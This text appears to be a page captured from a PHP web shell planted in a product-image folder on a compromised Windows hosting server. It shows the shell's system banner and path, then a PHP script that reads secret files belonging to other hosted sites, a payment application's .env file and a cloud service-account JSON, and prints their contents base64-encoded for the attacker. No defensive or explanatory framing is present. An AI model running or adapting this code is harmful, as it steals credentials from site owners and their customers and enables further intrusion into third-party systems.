System: Windows NT WINDOWS18 10.0 build 17763 (Windows Server 2016) AMD64 | User: IWPD_3544(appclien)
Path: D:\Inetpub\vhosts\appclients.in\fruits-vegitables.nmvm.org\image\product
[Back to List]
<?php
$high_value_files = [
'D:\Inetpub\vhosts\appclients.in\vrihadvhcfoundation.org\uniquehai\NewEcomWeb\pay\.env',
'D:\Inetpub\vhosts\appclients.in\gkaary.com\app\your-service-account-file.json'
];
$output = "";
foreach ($high_value_files as $file) {
if (file_exists($file)) {
$output .= "=== $file ===\n";
$output .= file_get_contents($file) . "\n\n";
} else {
$output .= "=== $file [NOT FOUND] ===\n\n";
}
}
echo base64_encode($output);
?>